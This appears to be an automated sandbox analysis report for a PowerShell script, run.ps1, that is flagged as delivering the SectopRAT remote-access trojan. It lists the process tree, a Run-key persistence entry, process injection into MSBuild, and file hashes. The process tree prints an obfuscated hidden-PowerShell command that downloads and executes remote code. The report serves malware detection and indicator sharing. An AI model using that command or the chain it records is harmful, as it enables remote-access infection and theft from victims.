Analysis
-
max time kernel
102s -
max time network
95s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
26/03/2025, 14:33
Static task
static1
General
-
Target
run.ps1
-
Size
141B
-
MD5
6fe6ee6a496894b815dd186af8babae5
-
SHA1
513ccf808eeeadd1d3d2c177e74534badb86fcfe
-
SHA256
b59c1eea07af1ef9c70705b34f09f3929b12c4df4e31597c0f62a8847157ed1f
-
SHA512
11e8b51b7af82c2221a4a863abff54405781be1e4751a6b408f4dd88762a53273eb2b8e89ad611444c47d9c043224773be340561d780dd99ab74777c8256c795
Malware Config
Signatures
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/5216-110-0x0000000000E00000-0x0000000000ED4000-memory.dmp family_sectoprat -
Sectoprat family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 1188 powershell.exe -
Executes dropped EXE 4 IoCs
pid Process 6064 kato.exe 3776 kato.exe 2964 TiVoDiag.exe 4460 TiVoDiag.exe -
Loads dropped DLL 7 IoCs
pid Process 3776 kato.exe 2964 TiVoDiag.exe 2964 TiVoDiag.exe 2964 TiVoDiag.exe 4460 TiVoDiag.exe 4460 TiVoDiag.exe 4460 TiVoDiag.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kato.exe = "C:\\Users\\Admin\\AppData\\Roaming\\KD8Y0n1n\\kato.exe" powershell.exe -
pid Process 4612 powershell.exe 1188 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4460 set thread context of 5932 4460 TiVoDiag.exe 97 PID 5932 set thread context of 5216 5932 cmd.exe 99 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TiVoDiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TiVoDiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4612 powershell.exe 4612 powershell.exe 1188 powershell.exe 1188 powershell.exe 2964 TiVoDiag.exe 4460 TiVoDiag.exe 4460 TiVoDiag.exe 5932 cmd.exe 5932 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4460 TiVoDiag.exe 5932 cmd.exe 5932 cmd.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeDebugPrivilege 5216 MSBuild.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4612 wrote to memory of 1188 4612 powershell.exe 84 PID 4612 wrote to memory of 1188 4612 powershell.exe 84 PID 1188 wrote to memory of 6064 1188 powershell.exe 93 PID 1188 wrote to memory of 6064 1188 powershell.exe 93 PID 6064 wrote to memory of 3776 6064 kato.exe 94 PID 6064 wrote to memory of 3776 6064 kato.exe 94 PID 3776 wrote to memory of 2964 3776 kato.exe 95 PID 3776 wrote to memory of 2964 3776 kato.exe 95 PID 3776 wrote to memory of 2964 3776 kato.exe 95 PID 2964 wrote to memory of 4460 2964 TiVoDiag.exe 96 PID 2964 wrote to memory of 4460 2964 TiVoDiag.exe 96 PID 2964 wrote to memory of 4460 2964 TiVoDiag.exe 96 PID 4460 wrote to memory of 5932 4460 TiVoDiag.exe 97 PID 4460 wrote to memory of 5932 4460 TiVoDiag.exe 97 PID 4460 wrote to memory of 5932 4460 TiVoDiag.exe 97 PID 4460 wrote to memory of 5932 4460 TiVoDiag.exe 97 PID 5932 wrote to memory of 5216 5932 cmd.exe 99 PID 5932 wrote to memory of 5216 5932 cmd.exe 99 PID 5932 wrote to memory of 5216 5932 cmd.exe 99 PID 5932 wrote to memory of 5216 5932 cmd.exe 99 PID 5932 wrote to memory of 5216 5932 cmd.exe 99
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W H "&{ iex ( iwr ( ('https://[email protected]/temp/wEotIbaw#.txt') -split '[#@*]+' -join '' ) -UseBasicParsing ).Content }"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe"C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6064 -
C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe"C:\Windows\TEMP\{F5AB2627-01BA-4831-A10E-173E5244715D}\.cr\kato.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\KD8Y0n1n\kato.exe" -burn.filehandle.attached=640 -burn.filehandle.self=6444⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exeC:\Windows\TEMP\{90E71157-C08C-4DC0-8EAC-7F01CC2D0F69}\.ba\TiVoDiag.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exeC:\Users\Admin\AppData\Roaming\debugDemo\TiVoDiag.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5216
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d284e7ae3997969d312c6e20c8eaa3ac
SHA17681d49355053dc9efae6ba5bd893ba0518f9315
SHA25603bdec025bd5fdc7bcf3efa6d4baf21d6cdedde935bceda65858a30125d4b456
SHA51247b4b62f6099eea6a5a84e7ff246f7f537db22e36039b8b1ec95e8375723c5185afc8e5581f7f3f25931c701d36bbe562fcdc68499aa5916ef4bb1a366bd1e6d
-
Filesize
64B
MD5067b7e92295dc36fa9e6293641ff06e1
SHA17da84ff603265697db7ef5afd6286d30292e04b9
SHA256c54f69103b33c8e778c945142dfc3db4cdc439171c46fda006d3fe47cd8e8417
SHA512df3719a351346a89776064162800797aebbf6f104de51cc97cf1f03f50eb1d99ff77a7d39c10a3497319268fd3b5a8486ecf36dccd2386af93e7b404e64be764
-
Filesize
1.6MB
MD572128553c9b8eb2e14330a6484cfd5ee
SHA1475b5201ae76c420a813b539723a74e19a6e744b
SHA256746a17b27bc23765245abd6d64944b05d1c879f9926f31744bd06882120c6a89
SHA5125243ab89fa9995fbfcf45db53848ef7b128e915b3f3947c0bb70a773b7d94bbd1fee0fb308802f79508b3965fe0accd959f27def6883895dff47b4e29398dca7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.0MB
MD5e5f6219b54266957ab0da8224f0fd830
SHA1cb5d9bc8901daea8fcc4ed4b97aaaa1651ead30c
SHA256a4c67af2f732b249f2879a3334006713a8f0aa07f771a80065cbfa6b4637a403
SHA51283fbef2bdc90e61f622769f0f28936388dad7cf321f1df67af9819724de1d65a4d5624b885bbda80ac8a372e5408585adbef34860e43d54fc12e456182e5564e
-
Filesize
467KB
MD5c058b36fb6b007c2920604229b1fa0a3
SHA11377c5c47f08ffabb6a3359cdc2c3b5c8df958bb
SHA25637cc3ebff3b7b7e55e8a8cc8785449152c6b119d25bacc6671b089dca7998ca2
SHA512a53f211cae71d083bb3fd6c2918384ed00a5b35cf67f28544303111e05abbc464b8033d649957a0665ff32c2180b594e3fbd66f90c4f783e2e8ee5d6865108c3
-
Filesize
1.3MB
MD57b0a2c7dcbaf47949428b8f82570fa89
SHA1c85af70092b1d97d28aef786e97507c748359724
SHA256f3b12aa0fa6d27a0c9401d0c0b7a564b342a7e1d65f0827a139ac505db0d4e85
SHA5127377ebe6e2fc625718c8a94b190b5ec211307a4dbb672dcbc1efc95cc57a26138ebc150b52aea06cc26002ad0bdd876eb8bb6cbe8303b9fd51646fe29f4d1f08
-
Filesize
1.3MB
MD59882ac3b1c5d3f27475cdcf2edd6694f
SHA13a01679cab83c493ed0bcd946c50c2c675a0a270
SHA2566a73fb33a020f62b03ba576d4627ec87f1d7af73066a16a5290b4db0042c0b3c
SHA5127a35ed2179b479afebbf386b7cbd5c2d301cc2778708dfcebb5ac2c658d86578b1161149a66623f18dd0b193da5acc819f27d14ef2f703567ee84a7b67f4d992
-
Filesize
815KB
MD5379ba636ef26aa22b2636bb0ba2876d2
SHA15d1b53d63b9de9138e1a679a928d9cf34413711f
SHA25670ea7dcb7e15202e806cf8e3d3f250c1432c1af01c25a440f55fd07eec4913ad
SHA512066a456cc7ae9b16e5293cf979d5f0bae2ad095b76925a7f9aa1ab184d468b40bbe6d81655fb97766d786fa1bc7174f3c5b76f6e0de3205f60e09a4e69f992f5
-
Filesize
55KB
MD5df4f621ea64bac21c2051ef4a2e9cb30
SHA103cc13749b9b73223df4820d9568b262488aacab
SHA256e2f35cd3969c76969aca8720d6bd3bdc4b2d77785c797c2b51ff9646aea7e3e6
SHA512c3efe090cb9f0363c80c60e1f1b4e8a0688a26ed6062aaa9df0afbaa6700227fe8527e21dcb03442ff99f4a8c1a02e021c5520102f55311a7a56798708f37158
-
Filesize
535KB
MD5b86ca5c4e56fedb923332528bf09ef48
SHA1251ba312b1461270d866510fb7fc9b8dd42740d3
SHA25608f820cffb07375c795ab336dc248be94457e44f6b2fabd3c6d27230a41d98d2
SHA512c6d71ff960dc288931443cbfb9a3786b317f19206359d4842f7e3d1c304a4cd61a177ed058899da678bc2ba50b4235e4267889762cd98c46e4d0a35d0523cfc8
-
Filesize
2.9MB
MD5ee5d43fee47f62dc57e5e509fd6a9056
SHA10dafc5b4458d61986988dcf7e90c4ab5c13d15de
SHA2561c331c776a850d970d39be136659746c0729c393b6e6c934f1ab1c9075f76973
SHA512e2180ca5d43b87723705bb9a4a4e1c13bea2f8bf12aa7bb798cdbf68b5acc6c731d8c07b839b2e1749c8c6135899201a2389bc75669301337ec7da46b0827ec5